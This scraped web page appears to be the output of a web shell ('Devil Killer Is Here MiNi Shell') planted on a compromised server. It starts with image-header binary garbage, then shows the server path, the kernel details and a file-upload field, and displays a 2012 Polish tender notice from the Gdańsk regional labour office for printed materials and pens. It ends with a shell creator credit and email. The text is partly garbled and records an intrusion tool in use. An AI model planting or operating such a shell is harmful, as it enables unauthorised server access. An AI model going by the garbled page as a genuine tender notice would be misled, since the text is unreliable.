JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120919/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120919/355458-N-2012.html

<p class="kh_header"><b>Gdańsk: Przetag nieograniczony na  usługę drukowania, wykonania i dostawy materiałów informacyjnych dla Wojewódzkiego Urzędu Pracy w Gdańsku</b><br>
<b>Numer ogłoszenia: 355458 - 2012; data zamieszczenia: 19.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Urząd Pracy w Gdańsku , ul. Podwale Przedmiejskie 30, 80-824 Gdańsk, woj. pomorskie, tel. 58 3264890, faks 58 3009343.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetag nieograniczony na  usługę drukowania, wykonania i dostawy materiałów informacyjnych dla Wojewódzkiego Urzędu Pracy w Gdańsku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa drukowania, wykonania i dostawy materiałów informacyjnych  dla Wojewódzkiego Urzędu Pracy w Gdańsku.

Zamówienie realizowane jest w dwóch częściach.

 1) Część I

Zadanie 1

Druk 500 szt. kalendarzy biurkowych, leżących z  dostawą w miejsce wskazane przez Zamawiającego. 
Usługa obejmuje druk i dostawę kalendarzy biurkowych leżących, pełniących jednocześnie funkcję podkładki na biurko i organizera:  
- format 40 cm x 60 cm, 20 str.,
- nakład: 500 szt.,
- klejenie wzdłuż dłuższego brzegu,
- 20 szt. jednakowych kartek,
- druk jednostronny offsetowy, 4/0,
- papier offset 80-90 g/m2 biały.
 Wyżej wymieniony  kalendarz winien zawierać  
- kalendarz na 2013 rok, 
- miejsce na notatki,
- dane teleadresowe WUP w Gdańsku oraz powiatowych urzędów pracy z terenu woj. pomorskiego wraz z danymi kontaktowymi do pośredników pracy realizujących zadania EURES,
- adresy stron internetowych: www.wup.gdansk.pl,  www.eures.praca.gov.pl,  www.eures.europa.eu- dane teleadresowe do wojewódzkich urzędów pracy wraz z danymi kontaktowymi do doradców EURES, 
- logo WUP Gdańsk, logo woj. pomorskiego, logo EURES.
Wykonawca przedstawi 2 propozycje graficzne kalendarza do wyboru przez Zamawiającego.

Zadanie 2

Druk 3000 szt. ulotki informacyjnej z dostawą w miejsce wskazane przez Zamawiającego.
Usługa obejmuje druk 3000 szt, ulotek 
-  format DL  99 mm x 210 mm,
- nakład: 3000 szt.,
- druk w pełnym kolorze,
- obustronny 4/4,
- papier kreda błysk 150 g/m2,
- druk offsetowy,
- projekt dostarczy Zamawiający

Zadanie 3

Druk 2000 szt. ulotki format 3xA5 z dostawą w miejsce wskazane przez Zamawiającego.
Usługa obejmuje druk 2000 szt. ulotki: 
- format 3xA5 po obcięciu, łamana na 3 do formatu A5,
- nakład: 2000 szt.,
- kolor 4/4,
- papier kreda błysk 150 g,
- lakier offsetowy 1/1,
- druk offsetowy,
- projekt dostarczy Zamawiający.

Zadanie 4
Druk 3000 szt. broszury format A5 po złożeniu z dostawą w miejsce wskazane przez Zamawiającego.
Usługa obejmuje druk 3000 szt. broszury
 - druk- broszura format A5 po złożeniu,
- nakład 3000 szt.
- 20 str. środka + 4 str. okładki,
- szyta,
- druk offsetowy w kolorze 4/4,
- papier kreda mat 150 g,
- lakier offsetowy po całości + lakier punktowy UV na zewnętrznych stronach okładki,
- projekt dostarczy Zamawiający,
- link   podglądowy http://wup.gdansk.pl/g2/2010_03/49dbeb271eedd634517021b76cccb3da.pdf
  
Zadanie 5 
Druk 800 szt. plakatu format A2 z dostawą w miejsce wskazane przez Zamawiającego
Usługa obejmuje druk 800 szt. plakatu format A2 
-  format A2 po obcięciu,
-  nakład 800 szt.,
- druk offsetowy jednostronny w kolorze 4/0,
- papier kreda mat 150g,
- lakier offsetowy + lakier punktowy UV,
- projekt dostarczy Zamawiający.

Zadanie 6
Druk 800 szt. naklejki/ wklejki do plakatu format  A4 z dostawą w miejsce wskazane przez Zamawiającego.
Usługa obejmuje druk 800 szt. naklejki/ wklejki do plakatu format  
- papier samoprzylepny z możliwością dalszego drukowania na drukarkach atramentowych i  laserowych,
- format A4,
- nakład 800 szt., 
- druk offsetowy jednostronny w kolorze 4/0,
- projekt dostarczy Zamawiający.

Zadanie 7
Druk 3000 szt. ulotki (listek) formatu DL po obcięciu, z dostawą w miejsce wskazane przez Zamawiającego.

Usługa obejmuje druk 3000 szt. ulotki (listek) formatu DL po obcięciu
 - format DL po obcięciu,
- nakład 3000 szt.,
- druk offsetowy w kolorze 4/4,
- papier offsetowy matowy 135 g,
- projekt dostarczy Zamawiający.


2)Część II

Zadanie 1
Wykonanie 4000 szt. notesu/ bloczka firmowego z dostawą w miejsce wskazane przez Zamawiającego.
Usługa obejmuje wykonanie 4000 szt. notesu/ bloczka firmowego:
 - format: A5,
- nakład 4000 szt.,
- papier offsetowy 90g,
- liczba kartek w bloku: 20, 
- notes klejony po krótszym boku,
- bez okładki i podkładu
- druk offsetowy w kolorze 4/0,
- projekt przygotuje Wykonawca,
- w projekcie m. in. 3 logotypy, adres strony internetowej.

Wykonawca przedstawi 2 propozycje notesu/bloczka firmowego do wyboru przez Zamawiającego.

Zadanie 2
Wykonanie 4000 szt. długopisu metalowego z dostawą w miejsce wskazane przez Zamawiającego.
Usługa obejmuje wykonanie 4000 szt. długopisu metalowego:
 - nakład 4000 szt.,
- korpus z aluminium w kolorze czerwonym zbliżonym do koloru loga IDG (patrz strona http://www.wup.gdansk.pl/g2/2009_04/aa8acecbc80292c04162bea51be9a199.png)- z klipsem,
- wkład: niebieski;
- typ wkładu - wymienny
- odblokowanie wkładu: przez wciśnięcie,
- rozmiar nadruku na korpusie w przybliżeniu 60 mm x 6mm,
- nadruk po jednej stronie: 2 logotypy oraz adres strony internetowej - 1 kolor (biały),
- projekt przygotuje Wykonawca.

Przed wykonaniem materiałów Wykonawca przedstawi propozycję rozmieszczenia nadruku..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielanie zamówień uzupełniających dla każdej z części zamówienia, polegających na powtórzeniu rodzaju zamówień określonych w SIWZ i ofercie Wykonawcy w wysokości 50% wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.82.30.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony na podstawie przedłożonego przez Wykonawcę oświadczenia o spełnianiu warunków określonych w art. 22 ust. 1 ustawy (wzór oświadczenia stanowi załącznik nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony na podstawie przedłożonego przez Wykonawcę oświadczenia o spełnianiu warunków określonych w art. 22 ust. 1 ustawy (wzór oświadczenia stanowi załącznik nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony na podstawie przedłożonego przez Wykonawcę oświadczenia o spełnianiu warunków określonych w art. 22 ust. 1 ustawy (wzór oświadczenia stanowi załącznik nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony na podstawie przedłożonego przez Wykonawcę oświadczenia o spełnianiu warunków określonych w art. 22 ust. 1 ustawy (wzór oświadczenia stanowi załącznik nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony na podstawie przedłożonego przez Wykonawcę oświadczenia o spełnianiu warunków określonych w art. 22 ust. 1 ustawy (wzór oświadczenia stanowi załącznik nr 2 do SIWZ)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wup.gdansk.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Urząd Pracy w Gdańsku,  ul. Podwale Przedmiejskie 30, 80-824 Gdańsk,.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.09.2012 godzina 10:00, miejsce: Wojewódzki Urząd Pracy w Gdańsku,  ul. Podwale Przedmiejskie 30, 80-824 Gdańsk pok 218.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> usługa drukowania, wykonania i dostawy materiałów informacyjnych dla Wojewódzkiego Urzędu Pracy w Gdańsku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 1
Druk 500 szt. kalendarzy biurkowych, leżących z  dostawą w miejsce wskazane przez Zamawiającego. 
Usługa obejmuje druk i dostawę kalendarzy biurkowych leżących, pełniących jednocześnie funkcję podkładki na biurko i organizera:  
- format 40 cm x 60 cm, 20 str.,
- nakład: 500 szt.,
- klejenie wzdłuż dłuższego brzegu,
- 20 szt. jednakowych kartek,
- druk jednostronny offsetowy, 4/0,
- papier offset 80-90 g/m2 biały.
 Wyżej wymieniony  kalendarz winien zawierać  
- kalendarz na 2013 rok, 
- miejsce na notatki,
- dane teleadresowe WUP w Gdańsku oraz powiatowych urzędów pracy z terenu woj. pomorskiego wraz z danymi kontaktowymi do pośredników pracy realizujących zadania EURES,
- adresy stron internetowych: www.wup.gdansk.pl,  www.eures.praca.gov.pl,  www.eures.europa.eu- dane teleadresowe do wojewódzkich urzędów pracy wraz z danymi kontaktowymi do doradców EURES, 
- logo WUP Gdańsk, logo woj. pomorskiego, logo EURES.
Wykonawca przedstawi 2 propozycje graficzne kalendarza do wyboru przez Zamawiającego.
Zadanie 2
Druk 3000 szt. ulotki informacyjnej z dostawą w miejsce wskazane przez Zamawiającego
Usługa obejmuje druk 3000 szt, ulotek 
-  format DL  99 mm x 210 mm,
- nakład: 3000 szt.,
- druk w pełnym kolorze,
- obustronny 4/4,
- papier kreda błysk 150 g/m2,
- druk offsetowy,
- projekt dostarczy Zamawiający

Zadanie 3
Druk 2000 szt. ulotki format 3xA5 z dostawą w miejsce wskazane przez Zamawiającego.
Usługa obejmuje druk 2000 szt. ulotki: 
- format 3xA5 po obcięciu, łamana na 3 do formatu A5,
- nakład: 2000 szt.,
- kolor 4/4,
- papier kreda błysk 150 g,
- lakier offsetowy 1/1,
- druk offsetowy,
- projekt dostarczy Zamawiający.
Zadanie 4
 
Druk 3000 szt. broszury format A5 po złożeniu z dostawą w miejsce wskazane przez Zamawiającego.
Usługa obejmuje druk 3000 szt. broszury
 - druk- broszura format A5 po złożeniu,
- nakład 3000 szt.,
- 20 str. środka + 4 str. okładki,
- szyta,
- druk offsetowy w kolorze 4/4,
- papier kreda mat 150 g,
- lakier offsetowy po całości + lakier punktowy UV na zewnętrznych stronach okładki,
- projekt dostarczy Zamawiający,
- link   podglądowy http://wup.gdansk.pl/g2/2010_03/49dbeb271eedd634517021b76cccb3da.pdf
  
Zadanie 5 
Druk 800 szt. plakatu format A2 z dostawą w miejsce wskazane przez Zamawiającego
Usługa obejmuje druk 800 szt. plakatu format A2 
-  format A2 po obcięciu,
-  nakład 800 szt.,
- druk offsetowy jednostronny w kolorze 4/0,
- papier kreda mat 150g,
- lakier offsetowy + lakier punktowy UV,
- projekt dostarczy Zamawiający.

Zadanie 6

Druk 800 szt. naklejki/ wklejki do plakatu format  A4 z dostawą w miejsce wskazane przez Zamawiającego.
Usługa obejmuje druk 800 szt. naklejki/ wklejki do plakatu format  
- papier samoprzylepny z możliwością dalszego drukowania na drukarkach atramentowych i  laserowych,
- format A4,
- nakład 800 szt., 
- druk offsetowy jednostronny w kolorze 4/0,
- projekt dostarczy Zamawiający.
Zadanie 7
Druk 3000 szt. ulotki (listek) formatu DL po obcięciu, z dostawą w miejsce wskazane przez Zamawiającego.
Usługa obejmuje druk 3000 szt. ulotki (listek) formatu DL po obcięciu:
 - format DL po obcięciu,
- nakład 3000 szt.,
- druk offsetowy w kolorze 4/4,
- papier offsetowy matowy 135 g,
- projekt dostarczy Zamawiający..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.82.30.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> usług drukowania, wykonania i dostawy materiałów informacyjnych dla Wojewódzkiego Urzędu Pracy w Gdańsku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 1
Wykonanie 4000 szt. notesu/ bloczka firmowego z dostawą w miejsce wskazane przez Zamawiającego.
Usługa obejmuje wykonanie 4000 szt. notesu/ bloczka firmowego:
 - format: A5,
- nakład 4000 szt.,
- papier offsetowy 90g,
- liczba kartek w bloku: 20, 
- notes klejony po krótszym boku,
- bez okładki i podkładu
- druk offsetowy w kolorze 4/0,
- projekt przygotuje Wykonawca,
- w projekcie m. in. 3 logotypy, adres strony internetowej.

Wykonawca przedstawi 2 propozycje notesu/bloczka firmowego do wyboru przez Zamawiającego.

Zadanie 2

Wykonanie 4000 szt. długopisu metalowego z dostawą w miejsce wskazane przez Zamawiającego.

Usługa obejmuje wykonanie 4000 szt. długopisu metalowego:
 - nakład 4000 szt.,
- korpus z aluminium w kolorze czerwonym zbliżonym do koloru loga IDG (patrz strona: http://www.wup.gdansk.pl/g2/2009_04/aa8acecbc80292c04162bea51be9a199.png)
- z klipsem,
- wkład: niebieski
- typ wkładu - wymienny
- odblokowanie wkładu: przez wciśnięcie,
- rozmiar nadruku na korpusie w przybliżeniu 60 mm x 6mm,
- nadruk po jednej stronie: 2 logotypy oraz adres strony internetowej - 1 kolor (biały),
- projekt przygotuje Wykonawca.

Przed wykonaniem materiałów Wykonawca przedstawi propozycję rozmieszczenia nadruku..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.82.30.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com